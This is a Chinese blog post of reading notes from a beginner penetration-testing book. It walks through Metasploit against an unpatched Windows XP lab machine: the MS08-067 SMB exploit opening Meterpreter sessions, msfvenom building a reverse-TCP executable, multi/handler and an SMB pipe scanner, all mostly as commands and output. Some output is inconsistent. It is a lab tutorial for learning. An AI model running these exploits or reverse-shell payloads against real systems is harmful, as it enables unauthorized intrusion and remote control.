【四】Metasploit渗透工具
介绍:记录读书笔记
❤️ 书名:渗透测试 完全初学者指南
工具:
- kali Linux(带Metasploit)
- windows XP sp2(未安装安全补丁)
1.启动Metasploit
<1>.启动Metasploit
┌──(root💀kali)-[/home/kali]
└─# service postgresql start
┌──(root💀kali)-[/home/kali]
└─msfconsole
<2>.help
msf6 > help route
Route traffic destined to a given subnet through a supplied session.
Usage:
route [add/remove] subnet netmask [comm/sid]
route [add/remove] cidr [comm/sid]
route [get] <host or network>
route [flush]
route [print]
Subcommands:
add - make a new route
remove - delete a route; 'del' is an alias
flush - remove all routes
get - display the route for a given target
print - show all active routes
Examples:
Add a route for all hosts from 192.168.0.0 to 192.168.0.255 through session 1
route add 192.168.0.0 255.255.255.0 1
route add 192.168.0.0/24 1
Delete the above route
route remove 192.168.0.0/24 1
route del 192.168.0.0 255.255.255.0 1
Display the route that would be used for the given host or network
route get 192.168.0.11
<3>.查找Metasploit模块
- 在线的Metasploit模块数据库
- 内置的搜索命令
msf6 > search ms08-067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netap
- 验证命令
msf6 > info exploit/windows/smb/ms08_067_netapi
Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Platform: Windows
Arch:
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Disclosed: 2008-10-28
Provided by:
hdm <x@hdm.io>
Brett Moore <brett.moore@insomniasec.com>
frank2 <frank2@dc949.org>
jduck <jduck@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows 2003 SP0 Universal
4 Windows XP SP2 English (AlwaysOn NX)
5 Windows XP SP2 English (NX)
6 Windows XP SP3 English (AlwaysOn NX)
......
70 Windows 2003 SP2 Japanese (NO NX)
71 Windows 2003 SP2 French (NO NX)
72 Windows 2003 SP2 French (NX)
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload information:
Space: 408
Avoid: 8 characters
Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing NX on some operating systems and service packs.
The correct target must be used to prevent the Server Service (along
with a dozen others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This
is just the first version of this module, full support for NX bypass
on 2003, along with other platforms, is still in development.
References:
https://cvedetails.com/cve/CVE-2008-4250/
OSVDB (49243)
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/MS08-067
http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos
2.简单使用
<1>.指定攻击模块
msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) >
<2>.设置模块选项
[1].显示要设置的模块选项
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.159.129 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targetin
[2].设置的模块选项
RHOST:目标主机IP
RPOST:目标主机端口
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.159.131
RHOST => 192.168.159.131
[3].Exploit Target
msf6 exploit(windows/smb/ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows 2003 SP0 Universal
4 Windows XP SP2 English (AlwaysOn NX)
5 Windows XP SP2 English (NX)
6 Windows XP SP3 English (AlwaysOn NX)
7 Windows XP SP3 English (NX)
8 Windows XP SP2 Arabic (NX)
9 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
......
71 Windows 2003 SP2 French (NO NX)
72 Windows 2003 SP2 French (NX)
<3>.有效载荷
[1].捡索兼容的有效载荷
msf6 exploit(windows/smb/ms08_067_netapi) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 generic/custom normal No Custom Payload
1 generic/debug_trap normal No Generic x86 Debug Trap
2 generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
3 generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
......
146 windows/vncinject/reverse_tcp_uuid normal No VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
[2].运行
┌──(root💀kali)-[/home/kali]
└─nmap 192.168.159.131 1 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-25 10:39 EDT
Nmap scan report for 192.168.159.131
Host is up (0.0013s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
MAC Address: 00:0C:29:F8:26:9E (VMware)
可见目标主机的445端口已经开启。如果没有开启,则需要在目标主机的命令行中输入regedit打开注册表,在HKEY_LOCAL_MACHINE中依次打开System\CurrentControlSet\Services\NetBT\Parameters,修改SMBDeviceEnabled的子键值为1。
————————————————
版权声明:本文为CSDN博主「Zoran_db」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/m0_53979135/article/details/112919281
msf6 exploit(windows/smb/ms08_067_netapi) > set RPORT 139
RPORT => 139
[*] 192.168.159.132 - Meterpreter session 1 closed. Reason: User exit
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 192.168.159.129:4444
[*] 192.168.159.132:445 - Automatically detecting the target...
[*] 192.168.159.132:445 - Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] 192.168.159.132:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 192.168.159.132:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.159.132
[*] Meterpreter session 2 opened (192.168.159.129:4444 -> 192.168.159.132:1037) at 2021-03-28 09:10:35 -0400
meterpreter > pwd
C:\WINDOWS\system32
meterpreter >
3. shell的种类
<1>.手动设置有效payload
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
4.使用Msfvenom创建有效载荷(重点)
1. 选取payload(有效载荷)
msfvenom -l payload
2. 设定相关选项
msfvenom -p windows/meterpreter/reverse_tcp -o
3. 选择输出格式
┌──(root💀kali)-[/home/kali/mydirectory/msfvenim]
└─msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.159.129 LPORT=4444 -f exe > chapter4example.exe 1 ⨯
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
4. 部署可执行文件
多种方式,例如,存储到服务器中以别人下载等.这里我直接托拽。但此时还未连接靶机
5. 使用multi/handler摸块连接靶机
sf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show
[-] Argument required
[*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options
[*] Additional module-specific parameters are: missing, advanced, evasion, targets, actions
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set LHOST 192.168.159.129
LHOST => 192.168.159.129
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 12345
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.159.129:4444
此时在靶机运动exe文件,成功连接靶机!!!
[*] Sending stage (175174 bytes) to 192.168.159.132
[*] Meterpreter session 3 opened (192.168.159.129:4444 -> 192.168.159.132:1055) at 2021-03-28 09:38:45 -0400
meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop
5. 使用辅助类摸块
- 不必设置payload的摸块就不是直接涉及漏洞利用的模块,它们都属于辅助类摸块,可对多台主机进行操作(不同于exploit类对一台主机进行操作)
msf6 exploit(multi/handler) > use scanner/smb/pipe_auditor
msf6 auxiliary(scanner/smb/pipe_auditor) >
msf6 auxiliary(scanner/smb/pipe_auditor) > show options
Module options (auxiliary/scanner/smb/pipe_auditor):
Name Current Setting Required Description
---- --------------- -------- -----------
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
- run
msf6 auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 192.168.159.132
RHOSTS => 192.168.159.132
msf6 auxiliary(scanner/smb/pipe_auditor) > run
[+] 192.168.159.132:139 - Pipes: \browser
[*] 192.168.159.132: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/pipe_auditor) >
其他
windows 查看IP地址-ipconfig
Windows 查看端口是否已打开 netstat
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/92696.html
